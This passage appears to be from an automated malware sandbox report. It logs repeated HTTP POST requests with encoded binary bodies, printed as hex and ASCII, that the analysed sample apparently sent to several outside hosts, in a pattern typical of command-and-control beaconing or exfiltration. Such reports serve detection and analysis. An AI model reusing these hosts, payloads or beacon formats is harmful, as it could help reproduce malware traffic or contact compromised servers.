irrdZ3gkiWtXRGou+52l5mteNFDAiEMyLOdHyOF79ztabE8mvYcUxarYqTITGMsBHXaBLFS52e9mHcCZw70Q+If0kylxnfow7QgUzQuYWQmmIhcqY3Uw9BspsCWz4Z35fJtXqy+vrpR3a4pdjuDi4MnoLCl/ZFBrj/QiuE28ykHlxSL5OZ99NwsU4/Wdwohy0wr3EUVOl+sZI7eVSTqi7r57wHn23+Q2HRBc+xVKUXyroauCqYxeJwlsC0sFk8MNanHR+XCzaF7YpPbo8YgRghHmlfRNaOuJS38QItL7rB8M3F/tCjwLRyeE5BZ9XJwnH/Zk8t1VJXvMFJ2w7dqXlbuUyyWmLlhulEt0eXVnvAjZwuJYKMsE1svGggoGODSN+5tuXpGqJH/7PAHQ+NPtc2OcZ/9JsZiZO+SgmiQD7yNXauhCZosV7CLKFYHVunOUeEa1vQNFkturGyjDfyhhqR1Ig4GY+GsDCKSXIBzYV8Fw16jvnNUsUfJP9En8cAFMXwVhSBKlb98u3dz5ZporZDrCfddx4ivxBwOwSA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 6f 6c 4c 53 52 6a 64 65 33 6d 67 4c 6d 64 75 4d 70 71 61 69 58 49 41 64 41 50 6e 74 6d 70 59 42 57 2f 58 76 4c 6b 52 39 41 2b 74 50 76 46 46 62 4a 32 59 59 4d 61 6b 44 58 6c 76 45 5a 63 57 6d 62 70 73 6a 47 4d 2b 68 64 53 57 4e 69 59 63 79 7a 41 37 31 72 63 34 5a 79 77 43 43 74 62 73 56 6f 7a 75 72 2f 2f 70 55 50 53 73 4e 4a 32 67 41 2f 63 48 36 76 55 39 32 38 59 66 71 41 56 55 48 78 2f 4a 52 64 38 62 56 78 34 53 56 65 38 53 36 6f 45 74 2b 79 31 32 4a 35 74 76 6f 71 4f 39 7a 4b 69 64 67 33 39 42 38 7a 68 45 38 63 52 55 32 37 37 70 6d 6e 74 6a 59 42 68 5a 47 35 68 50 38 7a 6f 4d 30 4c 7a 77 69 2f 32 45 77 4b 77 50 63 32 6e 36 6f 35 46 42 51 37 55 78 53 4e 75 6c 46 68 6b 58 62 2b 4d 73 74 56 74 7a 54 65 45 34 58 2b 6a 63 62 58 77 4c 41 79 32 71 57 32 35 61 73 45 64 5a 49 73 47 77 4c 42 79 34 46 73 75 39 61 50 77 38 32 43 7a 54 44 32 44 5a 74 73 7a 61 74 6e 71 6f 6a 42 33 49 32 63 2b 73 62 42 30 7a 4b 57 69 65 70 71 6c 4c 57 42 59 45 54 59 54 67 2b 79 69 38 79 74 4d 6b 63 48 57 77 34 72 73 44 69 56 44 43 57 35 50 63 56 31 73 69 42 58 4e 2b 61 79 6a 5a 51 46 30 2f 65 66 76 6f 50 4a 6f 75 2b 78 6c 78 2b 55 6f 6f 31 56 49 33 46 6b 55 64 46 73 34 4c 4b 45 76 7a 6b 64 64 69 52 56 68 35 4d 4e 37 6c 6d 6f 67 6e 51 46 43 62 59 56 5a 64 69 2b 64 65 6e 6e 71 73 71 71 4b 72 62 76 4e 6c 58 5a 61 63 6d 50 38 46 71 5a 4f 61 39 45 63 4a 74 67 30 48 45 6f 51 68 37 37 43 33 31 54 32 78 36 50 46 34 77 54 37 4d 44 79 53 34 54 72 62 51 59 72 64 37 30 77 64 77 45 44 45 5a 4f 50 36 7a 57 74 68 6f 6d 77 74 6f 76 51 4a 31 53 35 39 45 76 74 74 4a 6d 4a 4b 47 74 7a 70 72 77 49 66 79 77 4e 39 4a 78 38 43 61 4e 6e 48 71 6d 6d 70 38 6e 74 72 66 39 41 51 44 36 36 6b 54 6d 50 30 70 52 5a 75 39 62 2b 6f 4a 78 2b 75 33 45 4d 6e 61 64 66 42 2b 30 44 44 49 6a 44 34 41 3d Data Ascii: olLSRjde3mgLmduMpqaiXIAdAPntmpYBW/XvLkR9A+tPvFFbJ2YYMakDXlvEZcWmbpsjGM+hdSWNiYcyzA71rc4ZywCCtbsVozur//pUPSsNJ2gA/cH6vU928YfqAVUHx/JRd8bVx4SVe8S6oEt+y12J5tvoqO9zKidg39B8zhE8cRU277pmntjYBhZG5hP8zoM0Lzwi/2EwKwPc2n6o5FBQ7UxSNulFhkXb+MstVtzTeE4X+jcbXwLAy2qW25asEdZIsGwLBy4Fsu9aPw82CzTD2DZtszatnqojB3I2c+sbB0zKWiepqlLWBYETYTg+yi8ytMkcHWw4rsDiVDCW5PcV1siBXN+ayjZQF0/efvoPJou+xlx+Uoo1VI3FkUdFs4LKEvzkddiRVh5MN7lmognQFCbYVZdi+dennqsqqKrbvNlXZacmP8FqZOa9EcJtg0HEoQh77C31T2x6PF4wT7MDyS4TrbQYrd70wdwEDEZOP6zWthomwtovQJ1S59EvttJmJKGtzprwIfywN9Jx8CaNnHqmmp8ntrf9AQD66kTmP0pRZu9b+oJx+u3EMnadfB+0DDIjD4A=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 35 76 69 6e 71 30 32 6f 6b 32 76 75 54 59 66 6f 78 43 32 43 39 77 62 79 48 52 69 37 68 55 58 55 30 59 58 65 46 36 68 35 78 67 65 4a 63 79 62 34 54 39 78 72 50 2b 37 6b 46 6b 55 52 75 42 62 61 64 65 53 35 4c 38 39 62 47 53 2b 59 4c 46 76 2f 33 61 4f 69 65 53 73 2f 49 69 4c 65 31 50 6e 4a 39 4f 74 44 32 31 47 34 7a 74 35 78 41 4d 72 79 73 79 6f 7a 76 4a 55 33 47 77 62 6a 56 6e 41 6c 56 35 53 31 48 55 43 37 6d 6c 68 78 58 7a 2b 36 56 42 2f 43 2f 56 72 61 53 43 4b 6a 62 2f 33 74 48 57 77 6f 45 39 6a 65 52 6a 32 78 4b 44 66 54 50 59 68 76 6c 55 62 2f 44 62 37 37 48 55 66 56 31 77 6c 6f 75 6e 7a 4a 47 71 4e 62 47 49 32 73 52 43 31 6e 67 69 73 53 75 66 42 34 79 72 56 44 62 58 41 42 61 66 45 72 49 70 31 31 63 2f 62 38 79 76 68 78 42 78 46 79 71 6e 47 49 69 58 54 67 52 75 48 44 62 44 33 6d 32 33 79 67 77 61 64 34 38 65 57 4b 69 68 30 74 39 74 50 77 4d 78 61 32 39 6f 56 6e 36 6f 4e 67 36 37 30 5a 6d 4a 67 7a 79 42 36 42 47 67 4f 77 47 45 71 39 66 30 42 4f 4d 4e 4e 41 49 51 58 31 48 6b 49 71 4f 56 7a 50 4e 4e 4e 34 48 77 77 56 38 77 65 55 61 2f 6c 76 42 74 71 45 68 36 53 6d 48 76 53 4e 64 44 45 65 6d 32 47 45 72 67 56 41 46 62 72 35 64 35 52 4a 65 41 67 36 6d 50 37 6a 61 77 49 72 70 61 75 2b 41 47 38 71 55 53 5a 66 36 51 67 2b 4d 59 59 77 44 42 5a 62 36 35 35 37 36 74 63 6a 69 7a 74 4d 31 2f 4b 59 69 6a 7a 78 64 64 55 73 48 74 2b 73 52 53 50 67 42 4e 65 51 35 36 49 6a 35 74 4f 79 73 76 41 32 48 4c 2b 4d 4f 52 57 62 76 34 30 64 38 56 55 76 4d 2f 39 64 75 41 4e 76 75 65 6f 52 68 32 4e 58 33 4b 36 2f 57 51 5a 33 57 4d 2b 62 70 46 2b 75 56 4d 66 75 73 5a 4a 45 6a 53 6d 55 36 62 6e 75 48 43 44 4c 47 39 2b 49 7a 6b 50 53 55 47 51 41 41 35 32 45 43 30 4a 7a 6d 57 45 2f 72 4a 4d 48 42 42 30 6f 77 67 3d 3d Data Ascii: 5vinq02ok2vuTYfoxC2C9wbyHRi7hUXU0YXeF6h5xgeJcyb4T9xrP+7kFkURuBbadeS5L89bGS+YLFv/3aOieSs/IiLe1PnJ9OtD21G4zt5xAMrysyozvJU3GwbjVnAlV5S1HUC7mlhxXz+6VB/C/VraSCKjb/3tHWwoE9jeRj2xKDfTPYhvlUb/Db77HUfV1wlounzJGqNbGI2sRC1ngisSufB4yrVDbXABafErIp11c/b8yvhxBxFyqnGIiXTgRuHDbD3m23ygwad48eWKih0t9tPwMxa29oVn6oNg670ZmJgzyB6BGgOwGEq9f0BOMNNAIQX1HkIqOVzPNNN4HwwV8weUa/lvBtqEh6SmHvSNdDEem2GErgVAFbr5d5RJeAg6mP7jawIrpau+AG8qUSZf6Qg+MYYwDBZb65576tcjiztM1/KYijzxddUsHt+sRSPgBNeQ56Ij5tOysvA2HL+MORWbv40d8VUvM/9duANvueoRh2NX3K6/WQZ3WM+bpF+uVMfusZJEjSmU6bnuHCDLG9+IzkPSUGQAA52EC0JzmWE/rJMHBB0owg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 43 53 77 34 4a 47 37 55 4a 6a 4e 58 6b 30 6f 2b 65 5a 44 4a 44 4e 48 76 57 56 72 75 6a 68 44 68 67 6b 4f 6b 38 79 70 57 35 47 6f 6d 77 52 67 6e 4e 69 6b 4b 77 57 34 43 79 77 4f 6b 6f 33 7a 63 52 77 37 66 63 53 34 43 38 70 38 69 38 41 55 70 58 79 48 59 51 64 48 33 5a 4b 6b 57 79 32 55 69 79 42 45 6c 73 76 32 53 74 76 72 51 7a 35 79 6c 6b 48 53 37 42 71 53 50 49 4c 4c 65 67 50 41 5a 35 74 45 4c 55 61 38 4e 66 64 4c 71 42 6b 66 6a 4a 76 44 77 4c 2b 51 34 44 64 61 78 31 46 30 4e 6d 49 33 45 4e 57 4a 62 55 75 47 63 2f 65 49 37 50 30 2f 4e 39 32 46 6e 50 56 77 36 58 77 50 44 57 4a 37 30 79 71 4e 48 6c 62 44 30 43 33 4c 68 6f 68 44 4a 77 6c 39 6c 49 58 68 48 33 39 79 70 36 43 47 50 6b 63 58 48 4c 4a 6c 7a 56 63 35 75 64 62 4e 76 39 46 6d 65 48 58 59 71 57 51 69 69 65 63 32 52 4e 73 62 4d 37 4e 45 57 6b 35 4f 6f 54 51 6d 54 79 6f 30 61 48 68 42 7a 77 71 56 5a 6a 47 49 45 33 58 75 4a 68 67 63 46 41 38 76 79 4c 4f 57 64 34 62 4c 61 4f 76 58 5a 31 4f 73 4c 6a 4b 52 42 70 4c 30 39 74 2b 73 67 41 43 58 54 4b 36 73 41 39 2f 45 4e 4f 49 7a 46 2b 65 32 2b 6f 78 2b 37 4f 68 39 37 54 61 54 49 32 34 30 36 33 62 79 45 37 46 33 76 4c 57 59 53 32 79 63 4e 6e 69 6a 57 48 6b 4b 4f 59 78 32 43 33 36 74 70 39 6c 46 51 53 76 58 63 58 47 5a 6d 67 42 79 57 59 47 58 36 73 66 2f 71 47 67 5a 45 4c 70 41 51 31 74 4a 38 4d 6f 75 34 6a 47 42 75 74 65 6d 78 6b 67 64 61 4e 64 37 51 77 37 2f 59 63 67 69 72 6b 70 59 72 2b 64 39 6e 50 76 51 48 45 47 63 31 71 35 37 50 7a 4d 2b 55 47 34 66 2b 36 75 64 51 2b 72 4c 30 41 72 69 73 68 4f 33 6f 6b 63 30 62 2f 54 73 62 70 42 35 30 36 7a 46 54 76 72 6a 64 32 58 66 37 79 77 51 68 43 6e 78 4e 7a 5a 78 70 4d 52 58 43 63 37 44 6b 68 66 45 54 59 50 4e 4d 65 61 36 76 6f 6c 49 4d 70 77 3d 3d Data Ascii: CSw4JG7UJjNXk0o+eZDJDNHvWVrujhDhgkOk8ypW5GomwRgnNikKwW4CywOko3zcRw7fcS4C8p8i8AUpXyHYQdH3ZKkWy2UiyBElsv2StvrQz5ylkHS7BqSPILLegPAZ5tELUa8NfdLqBkfjJvDwL+Q4Ddax1F0NmI3ENWJbUuGc/eI7P0/N92FnPVw6XwPDWJ70yqNHlbD0C3LhohDJwl9lIXhH39yp6CGPkcXHLJlzVc5udbNv9FmeHXYqWQiiec2RNsbM7NEWk5OoTQmTyo0aHhBzwqVZjGIE3XuJhgcFA8vyLOWd4bLaOvXZ1OsLjKRBpL09t+sgACXTK6sA9/ENOIzF+e2+ox+7Oh97TaTI24063byE7F3vLWYS2ycNnijWHkKOYx2C36tp9lFQSvXcXGZmgByWYGX6sf/qGgZELpAQ1tJ8Mou4jGButemxkgdaNd7Qw7/YcgirkpYr+d9nPvQHEGc1q57PzM+UG4f+6udQ+rL0ArishO3okc0b/TsbpB506zFTvrjd2Xf7ywQhCnxNzZxpMRXCc7DkhfETYPNMea6volIMpw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 2b 42 57 6e 61 46 73 4e 4b 54 50 6a 38 62 47 34 63 75 4b 35 66 6b 53 73 48 75 66 68 49 69 6f 33 76 36 52 4b 4d 37 42 57 67 64 51 41 75 6b 2f 48 33 66 2f 59 48 61 6c 48 36 79 54 73 4f 77 44 57 2f 74 58 58 51 35 58 77 6a 4e 51 44 43 42 64 73 44 47 68 54 6a 7a 39 2f 31 62 61 30 66 48 47 56 6f 4a 4e 47 6b 59 42 56 4c 79 2f 64 73 36 59 65 73 6e 55 71 32 43 67 74 73 66 61 2b 4d 78 54 53 4e 47 33 70 44 66 44 71 35 6f 52 58 47 34 69 37 50 52 59 37 56 77 61 6c 35 41 41 32 49 52 4d 75 4a 70 37 41 6f 75 54 2f 75 73 5a 6c 64 59 76 66 6e 61 30 4c 71 64 34 38 61 39 30 75 30 6b 73 52 76 59 50 38 32 52 47 71 54 58 52 35 4b 72 56 70 48 33 4e 74 38 4b 66 56 35 58 39 72 75 7a 72 31 7a 46 51 6d 47 63 72 73 63 6d 46 76 52 4d 68 51 42 53 33 35 4a 4c 75 35 53 4d 4c 50 71 45 31 2b 55 69 53 56 32 38 33 66 72 39 67 43 58 64 42 6c 65 42 35 68 6e 30 55 4c 47 42 38 37 76 47 36 4b 36 6e 41 56 75 72 77 6a 79 54 4c 51 44 6c 74 2b 52 4d 31 39 2f 4e 6f 66 73 2b 46 4d 68 79 4d 58 2f 30 77 32 6c 41 32 4a 53 51 71 71 44 6c 53 39 61 35 35 56 38 57 59 4f 70 59 32 79 52 79 4c 31 45 64 5a 4b 4f 45 45 2f 72 37 6c 4d 38 52 52 5a 73 31 30 67 5a 4d 54 67 6b 43 78 2b 7a 66 6c 61 79 7a 64 53 5a 34 50 49 53 58 64 41 62 2f 52 77 61 77 7a 54 37 34 78 69 79 76 78 76 33 4e 67 42 51 37 61 68 39 64 43 6b 33 58 41 6a 74 6b 49 58 63 7a 68 4f 77 30 79 6e 62 65 65 64 37 44 47 37 53 64 34 52 70 6b 64 6f 39 6d 4e 38 4d 6f 67 6f 4d 36 37 6e 66 67 5a 47 42 57 4e 61 41 6d 62 69 54 36 67 74 68 33 45 49 52 6e 70 6f 39 70 2b 6d 73 42 30 67 38 50 47 74 6f 67 31 6a 31 74 51 51 7a 36 79 4f 78 4b 74 6c 39 55 58 4c 41 4e 69 31 41 55 76 74 4f 79 72 72 39 73 32 67 58 70 79 47 Data Ascii: +BWnaFsNKTPj8bG4cuK5fkSsHufhIio3v6RKM7BWgdQAuk/H3f/YHalH6yTsOwDW/tXXQ5XwjNQDCBdsDGhTjz9/1ba0fHGVoJNGkYBVLy/ds6YesnUq2Cgtsfa+MxTSNG3pDfDq5oRXG4i7PRY7Vwal5AA2IRMuJp7AouT/usZldYvfna0Lqd48a90u0ksRvYP82RGqTXR5KrVpH3Nt8KfV5X9ruzr1zFQmGcrscmFvRMhQBS35JLu5SMLPqE1+UiSV283fr9gCXdBleB5hn0ULGB87vG6K6nAVurwjyTLQDlt+RM19/Nofs+FMhyMX/0w2lA2JSQqqDlS9a55V8WYOpY2yRyL1EdZKOEE/r7lM8RRZs10gZMTgkCx+zflayzdSZ4PISXdAb/RwawzT74xiyvxv3NgBQ7ah9dCk3XAjtkIXczhOw0ynbeed7DG7Sd4Rpkdo9mN8MogoM67nfgZGBWNaAmbiT6gth3EIRnpo9p+msB0g8PGtog1j1tQQz6yOxKtl9UXLANi1AUvtOyrr9s2gXpyG
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 55 4a 55 53 47 2f 2f 6d 70 32 76 31 41 45 45 73 33 6b 6a 6d 4b 49 68 4a 38 79 42 56 4e 30 4d 35 6f 2b 59 4b 54 4c 6c 73 76 44 55 53 63 6c 72 4a 65 59 43 6f 51 7a 65 77 45 56 46 4d 74 65 34 4f 72 77 68 33 74 49 53 71 71 69 75 76 6f 5a 72 52 59 38 50 43 6e 5a 47 44 63 34 2b 32 53 4b 6a 65 61 2b 53 7a 6d 64 31 44 68 4c 4c 33 30 64 72 52 54 61 6c 4e 73 70 61 2f 55 58 78 79 73 6a 4f 65 4d 6b 74 4c 33 4a 37 35 77 56 36 30 61 70 51 61 58 65 4a 4a 37 71 37 61 68 42 79 64 74 2b 2f 78 78 55 36 50 42 70 34 59 31 2f 6f 48 50 41 36 43 35 73 6a 44 38 75 55 70 30 62 76 42 70 54 76 34 59 2f 70 62 6c 2f 45 2f 33 79 57 31 4c 42 4d 55 71 75 39 58 63 6e 59 71 4a 73 4f 7a 4c 67 4e 4b 44 6d 68 66 44 4d 51 35 35 64 6e 65 73 77 69 51 4b 74 57 65 45 30 4b 71 68 64 41 39 79 69 58 58 47 41 77 77 6d 6e 4a 35 75 2f 66 57 62 63 47 7a 4e 50 52 77 61 73 5a 35 34 72 75 6f 73 47 45 36 77 35 54 61 51 74 39 55 38 64 4b 34 57 63 6d 31 6f 64 6e 47 77 6f 69 52 6e 62 38 36 34 2b 67 46 74 62 2b 4c 6f 7a 30 55 56 70 43 34 51 65 55 6e 4d 51 31 71 4b 58 56 68 71 57 46 48 34 35 4e 67 61 66 68 53 49 79 69 77 4d 6a 4a 30 2b 4b 32 54 33 79 74 42 38 4f 54 73 64 6b 6b 39 59 65 7a 78 58 34 2b 47 44 67 30 75 63 6d 50 4d 75 56 6a 6c 2f 45 41 6e 55 6e 58 4d 39 70 77 66 4f 38 77 53 2f 52 34 38 30 39 52 75 57 59 36 34 69 5a 61 6b 45 4f 6c 54 6b 71 32 68 47 41 4f 4e 47 42 76 2b 4f 62 4a 38 49 79 54 4c 63 44 43 38 4c 51 59 67 55 4f 2b 54 4f 32 63 77 78 71 66 6b 52 32 55 61 6c 67 76 4a 74 44 31 54 77 4b 41 48 30 35 70 44 4e 43 71 68 72 7a 64 33 6b 6c 39 4b 55 35 54 4e 6c 42 70 75 33 53 6a 5a 62 39 36 34 4a 4c 46 47 37 4b 51 6e 78 36 42 36 42 30 77 69 44 74 76 68 51 6e 66 56 6c 70 6c 54 48 67 3d 3d Data Ascii: UJUSG//mp2v1AEEs3kjmKIhJ8yBVN0M5o+YKTLlsvDUSclrJeYCoQzewEVFMte4Orwh3tISqqiuvoZrRY8PCnZGDc4+2SKjea+Szmd1DhLL30drRTalNspa/UXxysjOeMktL3J75wV60apQaXeJJ7q7ahBydt+/xxU6PBp4Y1/oHPA6C5sjD8uUp0bvBpTv4Y/pbl/E/3yW1LBMUqu9XcnYqJsOzLgNKDmhfDMQ55dneswiQKtWeE0KqhdA9yiXXGAwwmnJ5u/fWbcGzNPRwasZ54ruosGE6w5TaQt9U8dK4Wcm1odnGwoiRnb864+gFtb+Loz0UVpC4QeUnMQ1qKXVhqWFH45NgafhSIyiwMjJ0+K2T3ytB8OTsdkk9YezxX4+GDg0ucmPMuVjl/EAnUnXM9pwfO8wS/R4809RuWY64iZakEOlTkq2hGAONGBv+ObJ8IyTLcDC8LQYgUO+TO2cwxqfkR2UalgvJtD1TwKAH05pDNCqhrzd3kl9KU5TNlBpu3SjZb964JLFG7KQnx6B6B0wiDtvhQnfVlplTHg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 43 53 77 34 4a 47 37 55 4a 6a 4e 58 6b 30 6f 2b 65 5a 44 4a 44 4e 48 76 57 56 72 75 6a 68 44 68 67 6b 4f 6b 38 79 70 57 35 47 6f 6d 77 52 67 6e 4e 69 6b 4b 77 57 34 43 79 77 4f 6b 6f 33 7a 63 52 77 37 66 63 53 34 43 38 70 38 69 38 41 55 70 58 79 48 59 51 64 48 33 5a 4b 6b 57 79 32 55 69 79 42 45 6c 73 76 32 53 74 76 72 51 7a 35 79 6c 6b 48 53 37 42 71 53 50 49 4c 4c 65 67 50 41 5a 35 74 45 4c 55 61 38 4e 66 64 4c 71 42 6b 66 6a 4a 76 44 77 4c 2b 51 34 44 64 61 78 31 46 30 4e 6d 49 33 45 4e 57 4a 62 55 75 47 63 2f 65 49 37 50 30 2f 4e 39 32 46 6e 50 56 77 36 58 77 50 44 57 4a 37 30 79 71 4e 48 6c 62 44 30 43 33 4c 68 6f 68 44 4a 77 6c 39 6c 49 58 68 48 33 39 79 70 36 43 47 50 6b 63 58 48 4c 4a 6c 7a 56 63 35 75 64 62 4e 76 39 46 6d 65 48 58 59 71 57 51 69 69 65 63 32 52 4e 73 62 4d 37 4e 45 57 6b 35 4f 6f 54 51 6d 54 79 6f 30 61 48 68 42 7a 77 71 56 5a 6a 47 49 45 33 58 75 4a 68 67 63 46 41 38 76 79 4c 4f 57 64 34 62 4c 61 4f 76 58 5a 31 4f 73 4c 6a 4b 52 42 70 4c 30 39 74 2b 73 67 41 43 58 54 4b 36 73 41 39 2f 45 4e 4f 49 7a 46 2b 65 32 2b 6f 78 2b 37 4f 68 39 37 54 61 54 49 32 34 30 36 33 62 79 45 37 46 33 76 4c 57 59 53 32 79 63 4e 6e 69 6a 57 48 6b 4b 4f 59 78 32 43 33 36 74 70 39 6c 46 51 53 76 58 63 58 47 5a 6d 67 42 79 57 59 47 58 36 73 66 2f 71 47 67 5a 45 4c 70 41 51 31 74 4a 38 4d 6f 75 34 6a 47 42 75 74 65 6d 78 6b 67 64 61 4e 64 37 51 77 37 2f 59 63 67 69 72 6b 70 59 72 2b 64 39 6e 50 76 51 48 45 47 63 31 71 35 37 50 7a 4d 2b 55 47 34 66 2b 36 75 64 51 2b 72 4c 30 41 72 69 73 68 4f 33 6f 6b 63 30 62 2f 54 73 62 70 42 35 30 36 7a 46 54 76 72 6a 64 32 58 66 37 79 77 51 68 43 6e 78 4e 7a 5a 78 70 4d 52 58 43 63 37 44 6b 68 66 45 54 59 50 4e 4d 65 61 36 76 6f 6c 49 4d 70 77 3d 3d Data Ascii: CSw4JG7UJjNXk0o+eZDJDNHvWVrujhDhgkOk8ypW5GomwRgnNikKwW4CywOko3zcRw7fcS4C8p8i8AUpXyHYQdH3ZKkWy2UiyBElsv2StvrQz5ylkHS7BqSPILLegPAZ5tELUa8NfdLqBkfjJvDwL+Q4Ddax1F0NmI3ENWJbUuGc/eI7P0/N92FnPVw6XwPDWJ70yqNHlbD0C3LhohDJwl9lIXhH39yp6CGPkcXHLJlzVc5udbNv9FmeHXYqWQiiec2RNsbM7NEWk5OoTQmTyo0aHhBzwqVZjGIE3XuJhgcFA8vyLOWd4bLaOvXZ1OsLjKRBpL09t+sgACXTK6sA9/ENOIzF+e2+ox+7Oh97TaTI24063byE7F3vLWYS2ycNnijWHkKOYx2C36tp9lFQSvXcXGZmgByWYGX6sf/qGgZELpAQ1tJ8Mou4jGButemxkgdaNd7Qw7/YcgirkpYr+d9nPvQHEGc1q57PzM+UG4f+6udQ+rL0ArishO3okc0b/TsbpB506zFTvrjd2Xf7ywQhCnxNzZxpMRXCc7DkhfETYPNMea6volIMpw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 51 32 72 36 6c 4e 39 39 4b 6a 4f 4d 70 54 64 57 50 6a 47 46 44 6d 68 6e 59 65 57 31 68 77 6d 59 67 33 4d 46 55 79 66 42 6a 2b 54 36 4d 64 76 4d 48 6c 71 39 76 56 53 61 7a 78 5a 75 4e 31 61 79 32 37 39 56 78 31 31 2b 4d 75 61 4a 43 56 79 66 54 6c 6b 66 6d 49 73 39 57 38 30 4c 47 4d 6b 65 43 62 70 52 2b 38 68 32 42 42 50 66 56 41 62 32 45 4f 33 53 34 41 79 79 4a 41 79 41 57 64 37 42 2b 64 37 32 6c 54 41 6d 56 37 46 4d 55 5a 6d 56 59 76 70 4c 71 6f 58 36 6f 73 56 72 33 75 4d 43 46 4e 32 5a 4e 31 76 6a 6f 48 33 6c 73 41 52 2b 79 77 4a 37 67 63 4d 5a 77 39 50 57 57 72 35 6a 6b 73 53 69 54 74 6d 49 2f 44 33 37 49 6f 71 73 59 42 2b 5a 68 72 78 62 48 30 50 4e 5a 6f 77 55 50 44 67 57 6d 52 41 48 41 2f 61 6d 33 46 5a 73 53 70 34 69 37 4c 70 62 44 4f 6c 7a 32 69 66 76 2f 70 68 4e 68 36 71 77 4f 50 51 76 6b 63 59 5a 44 2b 56 51 4b 6d 39 67 56 78 61 6b 66 37 45 4a 44 6f 79 78 44 36 56 64 4f 73 50 47 50 7a 6a 4c 78 4a 6a 4a 44 58 51 4f 4b 50 47 59 39 43 42 74 51 73 4a 70 34 48 52 34 45 70 5a 53 5a 71 31 31 33 2f 2b 6b 79 48 34 65 59 71 63 45 4c 76 6d 59 45 78 7a 47 48 6c 6a 73 57 53 71 65 33 4d 57 75 44 73 36 50 45 6c 64 62 35 4c 78 7a 78 2b 30 50 74 41 37 30 62 54 4b 64 73 78 2b 47 55 70 6d 42 48 59 67 41 35 52 2b 64 66 2b 5a 6a 51 38 77 61 76 59 72 76 58 36 72 4a 6c 69 4d 56 74 45 6c 4a 68 35 57 6e 72 39 49 31 50 4f 43 36 45 4c 53 39 32 45 73 6c 78 41 37 48 53 4b 4f 48 79 6a 63 4c 72 4e 38 68 79 41 38 6a 78 61 6c 51 4b 68 4b 36 6d 55 48 61 55 6b 6e 49 48 35 43 58 39 45 44 54 34 6a 50 57 49 7a 61 54 4d 67 71 2b 4f 75 6e 4f 58 70 2b 6e 61 36 39 4d 31 53 31 7a 6c 6e 6e 43 2f 65 6a 36 31 53 38 4f 79 52 49 33 48 32 6a 66 59 74 6d 7a 73 30 47 2b 4f 77 5a 6e 2f 7a 66 6a 77 63 6b 79 2b 6c 72 52 46 7a 65 64 57 37 65 45 4a 32 78 62 47 68 71 76 37 66 47 46 30 79 4a 33 Data Ascii: Q2r6lN99KjOMpTdWPjGFDmhnYeW1hwmYg3MFUyfBj+T6MdvMHlq9vVSazxZuN1ay279Vx11+MuaJCVyfTlkfmIs9W80LGMkeCbpR+8h2BBPfVAb2EO3S4AyyJAyAWd7B+d72lTAmV7FMUZmVYvpLqoX6osVr3uMCFN2ZN1vjoH3lsAR+ywJ7gcMZw9PWWr5jksSiTtmI/D37IoqsYB+ZhrxbH0PNZowUPDgWmRAHA/am3FZsSp4i7LpbDOlz2ifv/phNh6qwOPQvkcYZD+VQKm9gVxakf7EJDoyxD6VdOsPGPzjLxJjJDXQOKPGY9CBtQsJp4HR4EpZSZq113/+kyH4eYqcELvmYExzGHljsWSqe3MWuDs6PEldb5Lxzx+0PtA70bTKdsx+GUpmBHYgA5R+df+ZjQ8wavYrvX6rJliMVtElJh5Wnr9I1POC6ELS92EslxA7HSKOHyjcLrN8hyA8jxalQKhK6mUHaUknIH5CX9EDT4jPWIzaTMgq+OunOXp+na69M1S1zlnnC/ej61S8OyRI3H2jfYtmzs0G+OwZn/zfjwcky+lrRFzedW7eEJ2xbGhqv7fGF0yJ3
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 55 4a 55 53 47 2f 2f 6d 70 32 76 31 41 45 45 73 33 6b 6a 6d 4b 49 68 4a 38 79 42 56 4e 30 4d 35 6f 2b 59 4b 54 4c 6c 73 76 44 55 53 63 6c 72 4a 65 59 43 6f 51 7a 65 77 45 56 46 4d 74 65 34 4f 72 77 68 33 74 49 53 71 71 69 75 76 6f 5a 72 52 59 38 50 43 6e 5a 47 44 63 34 2b 32 53 4b 6a 65 61 2b 53 7a 6d 64 31 44 68 4c 4c 33 30 64 72 52 54 61 6c 4e 73 70 61 2f 55 58 78 79 73 6a 4f 65 4d 6b 74 4c 33 4a 37 35 77 56 36 30 61 70 51 61 58 65 4a 4a 37 71 37 61 68 42 79 64 74 2b 2f 78 78 55 36 50 42 70 34 59 31 2f 6f 48 50 41 36 43 35 73 6a 44 38 75 55 70 30 62 76 42 70 54 76 34 59 2f 70 62 6c 2f 45 2f 33 79 57 31 4c 42 4d 55 71 75 39 58 63 6e 59 71 4a 73 4f 7a 4c 67 4e 4b 44 6d 68 66 44 4d 51 